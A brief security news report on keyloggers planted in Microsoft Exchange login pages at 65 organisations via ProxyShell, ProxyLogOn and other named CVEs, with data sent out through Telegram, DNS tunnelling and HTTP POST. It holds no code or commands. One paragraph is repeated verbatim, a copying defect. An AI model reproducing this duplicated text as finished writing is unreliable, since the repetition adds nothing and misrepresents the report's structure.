Internet-exposed Microsoft Exchange servers belonging to 65 organizations around the world have been compromised with two different types of keyloggers enabling credential exfiltration, according to The Hacker News.
Attacks exploiting the ProxyShell and ProxyLogOn vulnerabilities, as well as the Exchange Server remote code execution bug, tracked as CVE-2021-31206, the Windows SMBv3 Client/Server RCE, tracked as CVE-2020-0796, and the IIS security feature bypass flaw, tracked as CVE-2014-4078, facilitated the injection of a keylogger that also pilfered user cookies and User Agent strings, a report from Positive Technologies showed. Other keyloggers were found to have used a Telegram bot, as well as a DNS tunnel and HTTP POST request, for data exfiltration. Most impacted by the intrusions were government organizations, while Vietnam, Russia, Taiwan, China, and Pakistan were the most targeted countries. "By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext," said researchers.
Attacks exploiting the ProxyShell and ProxyLogOn vulnerabilities, as well as the Exchange Server remote code execution bug, tracked as CVE-2021-31206, the Windows SMBv3 Client/Server RCE, tracked as CVE-2020-0796, and the IIS security feature bypass flaw, tracked as CVE-2014-4078, facilitated the injection of a keylogger that also pilfered user cookies and User Agent strings, a report from Positive Technologies showed. Other keyloggers were found to have used a Telegram bot, as well as a DNS tunnel and HTTP POST request, for data exfiltration. Most impacted by the intrusions were government organizations, while Vietnam, Russia, Taiwan, China, and Pakistan were the most targeted countries. "By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext," said researchers.
